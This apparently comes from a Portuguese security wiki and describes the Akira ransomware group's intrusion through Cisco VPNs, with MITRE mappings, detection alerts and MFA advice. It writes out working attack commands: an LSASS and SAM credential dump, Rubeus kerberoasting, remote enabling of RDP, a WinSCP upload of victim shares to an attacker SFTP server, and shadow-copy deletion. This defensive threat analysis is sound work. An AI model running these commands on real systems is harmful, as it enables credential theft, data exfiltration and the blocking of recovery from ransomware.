# PROC - Akira: Ransomware via Exploração de VPN Cisco
## Visão Geral
O [[akira-ransomware|Akira]] e um grupo de ransomware surgido em marco de 2023 que rapidamente se tornou um dos mais ativos globalmente, responsavel por centenas de ataques em seus primeiros 18 meses de operação. O grupo se especializou em explorar vulnerabilidades em appliances VPN Cisco - específicamente o Cisco ASA (Adaptive Security Appliance) e o Cisco FTD (Firepower Threat Defense) - como vetor de entrada primario. O CISA e o FBI documentaram que mais de 250 organizacoes foram vitimas do Akira com prejuizos superiores a US$42 milhões até inicio de 2024.
O Akira opera no modelo RaaS (Ransomware-as-a-Service) com um diferencial estetico notavel: seu site de negociacao e de leak tem visual que imita terminais de computadores dos anos 80, com texto verde em fundo preto e interação por linha de comando. Essa estetica retro e deliberada para criar memorabilidade - o grupo claramente investe em "branding" de ameaça.
O grupo desenvolveu variacoes do encryptor para Windows (C++) e Linux/VMware ESXi (C++), demonstrando capacidade técnica para impactar ambientes heterogeneos. A versao Linux usa `fork()` para criptografar múltiplos arquivos em paralelo, tornando o processo significativamente mais rapido que implementacoes single-thread. Uma versao experimental em Rust foi detectada em 2024.
## Attack Flow
```mermaid
graph TB
A["🌐 CVE em VPN Cisco ASA/FTD<br/>Sem MFA habilitado"] --> B["🔑 Credenciais VPN<br/>Bruteforce ou compra"]
B --> C["🦠 Implantar RAT<br/>AnyDesk / RustDesk"]
C --> D["🔑 Dump de Credenciais<br/>LSASS + registro SAM"]
D --> E["↔️ Movimento Lateral<br/>RDP + credenciais de dominio"]
E --> F["📤 Exfiltração<br/>WinSCP / FileZilla para FTP"]
F --> G["💀 Deploy Akira<br/>Windows + ESXi simultaneos"]
G --> H["🔒 Criptografia AES-256<br/>Extensao .akira nos arquivos"]
```
## Passo a Passo
### Fase 1 - Exploração de VPN Cisco sem MFA
O Akira demonstra preferência marcante por VPNs Cisco sem autenticação multifator configurada. CVEs explorados documentados:
- **CVE-2023-20269** (Cisco ASA/FTD - autenticação bypass) - permite brute force sem bloqueio
- **CVE-2024-20353** e **CVE-2024-20359** (Cisco ASA/FTD - linha de cluster) - RCE
- Cisco AnyConnect VPN sem MFA - brute force de credenciais válidas
A ausência de MFA em VPNs Cisco e especialmente prevalente em PMEs (pequenas e medias empresas) que configuram a VPN com usuario/senha apenas, sem segundo fator. O grupo usa listas de credenciais obtidas de outros vazamentos (credential stuffing) para identificar usuarios com senha reutilizada.
```
# Técnica documentada de enumeracao de VPN Cisco sem MFA
# O Cisco ASA retorna mensagens de erro distintas para usuario válido vs inválido
# permitindo enumeracao de usuarios válidos antes do bruteforce
```
### Fase 2 - Estabelecimento de Acesso Persistente
Após autenticação na VPN, o Akira implanta ferramentas de acesso remoto comerciais para persistência independente da sessao VPN ([[t1219-remote-access-software|T1219]]):
- **AnyDesk**: ferramenta RAT comercial legitima, raramente bloqueada por AV
- **RustDesk**: alternativa open-source ao AnyDesk, crescentemente usado
- **MeshAgent**: agente de gerenciamento remoto, em whitelist em muitos ambientes
A preferência por ferramentas legitimas e deliberada: bypass de controles de segurança e historico limpo de reputacao tornam a detecção mais dificil.
### Fase 3 - Escalada de Privilegios e Dump de Credenciais
Com foothold em um endpoint da rede, o grupo escalada para administrador local e extrai credenciais:
```powershell
# Dump de LSASS via método nativo (comsvcs.dll)
$process = Get-Process lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $process.id lsass.dmp full
# Dump do registro SAM (hash de contas locais)
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\sys.hive
```
Para escalada de dominio, o grupo frequentemente usa [[t1558-003-kerberoasting|Kerberoasting]]: solicitar tickets Kerberos de contas de servico com SPN configurado e quebrar as hashes offline:
```powershell
# Kerberoasting com Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# Quebrar offline com hashcat: hashcat -m 13100 kerberoast_hashes.txt wordlist.txt
```
### Fase 4 - Movimento Lateral via RDP
Com credenciais administrativas de dominio, o Akira se move lateralmente usando RDP nativo ([[t1021-001-remote-desktop-protocol|T1021.001]]):
```batch
# Habilitar RDP em hosts que não tem (via WMI)
wmic /node:SERVIDOR-ALVO computersystem call enableremotedesktop
# Ou via registro
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Adicionar usuario ao grupo RDP
net localgroup "Remote Desktop Users" DOMINIO\usuario_comprometido /add
```
O grupo prioriza servidores de backup, controladores de dominio e servidores de arquivos como alvos de movimento lateral - os ativos mais criticos para maximizar impacto do ransomware.
### Fase 5 - Exfiltração pre-Ransomware
A exfiltração usa ferramentas de FTP/SFTP comerciais configuradas para servidores sob controle do grupo ([[t1048-003-exfiltration-over-unencrypted-protocol|T1048.003]]):
```batch
# WinSCP em modo script para upload em lote
winscp.exe /script=exfil.txt
# conteúdo do script:
# open sftp://user:
[email protected]
# put -r C:\ShareData\ /upload/empresa_vitima/
# exit
```
Dados prioritarios para exfiltração: informações financeiras, dados de clientes, documentos estratégicos, dados de RH, contratos.
### Fase 6 - Deploy e Criptografia
O encryptor Akira e distribuido via PsExec, WMI ou GPO comprometida ([[t1486-data-encrypted-for-impact|T1486]]). Antes da criptografia, o grupo deleta shadow copies:
```batch
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
O encryptor Windows adiciona extensao `.akira` a todos os arquivos criptografados com AES-256-CBC + RSA-4096 para proteção da chave. A versao ESXi e implantada separadamente para atingir VMs simultaneamente.
## TTPs Mapeados
| Fase | Técnica MITRE | Descrição |
|------|--------------|-----------|
| Acesso Inicial | [[t1190-exploit-public-facing-application\|T1190]] | CVE em Cisco ASA/FTD sem MFA |
| Acesso Inicial | [[t1078-valid-accounts\|T1078]] | Credenciais VPN via credential stuffing |
| Persistência | [[t1219-remote-access-software\|T1219]] | AnyDesk/RustDesk como RAT persistente |
| Escalada | [[t1003-001-lsass-memory\|T1003.001]] | Dump de LSASS via comsvcs.dll |
| Escalada | [[t1558-003-kerberoasting\|T1558.003]] | Kerberoasting de contas de servico |
| Movimentação | [[t1021-001-remote-desktop-protocol\|T1021.001]] | RDP com credenciais de dominio |
| Exfiltração | [[t1048-003-exfiltration-over-unencrypted-protocol\|T1048.003]] | WinSCP/FileZilla para FTP do atacante |
| Evasão | [[t1490-inhibit-system-recovery\|T1490]] | Delecao de shadow copies |
| Impacto | [[t1486-data-encrypted-for-impact\|T1486]] | AES-256 + RSA-4096, extensao .akira |
## Detecção
**Alertas de alta prioridade:**
| Indicador | Severidade | Fonte |
|-----------|-----------|-------|
| Login VPN Cisco de IP nunca visto antes | Alta | VPN syslog / SIEM |
| AnyDesk/RustDesk instalado em servidor corporativo | Alta | Software inventory / EDR |
| `vssadmin delete shadows` executado | Critica | Sysmon Event 1 |
| Kerberos TGS request em massa de conta de usuario | Alta | AD KDC Event 4769 |
| RDP habilitado via WMI em servidor antes sem RDP | Critica | Sysmon + EDR |
| Upload FTP/SFTP de multi-GB para IP externo desconhecido | Critica | Firewall / NDR |
**Controle preventivo critico:** Habilitar MFA em TODAS as contas VPN Cisco. O Akira não tem bypass documentado para MFA em VPN - e o controle de mitigação mais eficaz contra o vetor de entrada primario do grupo.
## Contexto Brasil/LATAM
O Akira afetou organizacoes brasileiras e latino-americanas de forma significativa desde seu surgimento. No Brasil, PMEs dos setores de saúde, educação, servicos profissionais e manufacturing foram reportadas como vitimas. O grupo demonstra apetite por alvos de medio porte - menos protegidos que grandes corporacoes mas com dados suficientemente valiosos para justificar o ataque.
O vetor VPN Cisco e especialmente prevalente no contexto brasileiro: o Brasil e o maior mercado de equipamentos Cisco na América Latina, e appliances ASA sao amplamente utilizados em empresas de medio e grande porte. A configuração de VPN Cisco sem MFA e a norma em muitas PMEs brasileiras, criando uma superficie de ataque enorme para o modelo operacional do Akira.
O CISA emitiu advisory conjunto com FBI, Europol e NCSC em abril de 2024 específicamente sobre o Akira, recomendando urgentemente a habilitacao de MFA em VPNs como medida prioritaria. Organizacoes brasileiras com Cisco ASA/FTD devem auditar imediatamente a configuração de MFA e aplicar patches de segurança pendentes como acoes de curto prazo criticas.
## Referências
- [CISA Advisory AA24-109A — Akira Ransomware](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a)
- [FBI Flash — Akira Ransomware Indicators of Compromise](https://www.ic3.gov/Media/News/2023/230504.pdf)
- [Cisco PSIRT — CVE-2023-20269 Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asavpn-brute-force-2RnhzSMj)
- [Sophos — Akira Ransomware Technical Deep Dive](https://news.sophos.com/en-us/2023/07/17/akira-ransomware-is-pwned-by-akira-ransomware/)
- [SentinelOne — Akira Ransomware Linux/ESXi Analysis](https://www.sentinelone.com/labs/akira-ransomware-targets-linux-vmware-esxi-systems/)